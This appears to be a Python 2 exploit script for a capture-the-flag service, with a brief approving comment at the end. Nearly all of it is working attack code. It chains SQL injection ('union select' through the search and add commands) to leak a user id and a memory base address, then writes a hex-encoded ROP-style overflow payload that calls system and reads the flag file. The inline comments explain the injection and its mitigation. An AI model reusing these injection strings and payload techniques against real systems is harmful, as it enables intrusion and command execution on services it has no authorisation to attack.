import random | |
import socket | |
import string | |
import sys | |
import time | |
from binascii import hexlify | |
from binascii import unhexlify | |
def make_address(offset, address):
    """Return ``offset + address`` as 8 little-endian bytes.

    The sum is zero-padded to 16 hex digits, decoded to 8 bytes and then
    reversed, which yields the little-endian byte order.  Negative sums and
    sums wider than 64 bits are not handled specially (``unhexlify`` will
    reject the former; the latter produce more than 8 bytes).
    """
    big_endian = unhexlify(format(offset + address, "016x"))
    return big_endian[::-1]
# Python 2 script: `print` is a statement (last line) and the str payloads
# below are passed straight to sendall()/hexlify(); it does not run unmodified
# on Python 3.
# Hard-coded remote endpoint and binary-specific constants, taken as given by
# the script; nothing below derives them.
HOST = '88.198.89.199' | |
PORT = 1234 | |
system_address = -0xebace0 | |
# Connect | |
# NOTE(review): there is no error handling anywhere in this script -- a
# connection failure or a 2 s read timeout raises and aborts the run -- and
# the socket is never closed.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((HOST, PORT)) | |
s.settimeout(2) | |
s.recv(1024) | |
# Generate user | |
# Throwaway account name: 16 alphanumerics from the non-cryptographic
# `random` module (uniqueness, not secrecy, is what matters here).
username = ''.join([random.choice(string.ascii_letters + string.digits) for i in range(16)]) | |
# Register | |
s.sendall("register %s %s\n" % (username, username)) | |
s.recv(1024) | |
# Login | |
s.sendall("login %s %s\n" % (username, username)) | |
s.recv(1024) | |
# Leak userid | |
# The 'search' argument is evidently spliced into a SQL string server-side:
# the quote closes the literal, `union select` appends attacker-chosen rows
# and the trailing `#` (MySQL-style line comment) discards the rest of the
# original query.  Parameterised queries / prepared statements remove this
# whole class of bug; on the detection side, quotes plus `union select` and
# `information_schema` in a search term are the classic indicators.
s.sendall("search x' union select id from users where name='%s'#\n" % (username)) | |
s.recv(1024) | |
s.sendall("show 0\n") | |
# Reply parsing assumes one recv() returns the whole line and that the id
# starts at byte 3.
userid = int(s.recv(1024)[3:]) | |
# print "Userid: %d" % userid | |
# Leak base address | |
s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(14)#\n") | |
s.recv(1024) | |
s.sendall("show 11\n") | |
s.recv(4) | |
# Six raw bytes, read little-endian, minus a fixed binary offset.
offset = int(hexlify(s.recv(6)[::-1]), 16) - 0x19d0 | |
# print "Base address: 0x%x" % offset | |
s.recv(1024) | |
# Add dummy value and payload | |
payload = '\x00' * 56 + '\x02' + '\x00' * 7 | |
payload += make_address(offset, 0x223d) | |
payload += make_address(offset, 0x2238) | |
payload += make_address(offset, system_address) | |
payload += make_address(offset, 0x223d) | |
# Hex-encoded so the raw bytes survive inside a SQL string literal; the
# server's unhex() call below decodes them again.
payload = hexlify(payload) | |
# Second injection point, the 'add' command: same root cause (string-built
# SQL), same mitigation as above.
s.sendall("add dummy'), (%s, unhex('%s'))##" % (userid, payload)) | |
s.recv(1024) | |
# Overflow payload to 0x203d68 | |
s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(10) union select content from todos where user=%s#\n" % userid) | |
s.recv(1024) | |
# Test | |
s.sendall("add cat /home/user/flag\n") | |
print s.recv(1024) |
nice exploit!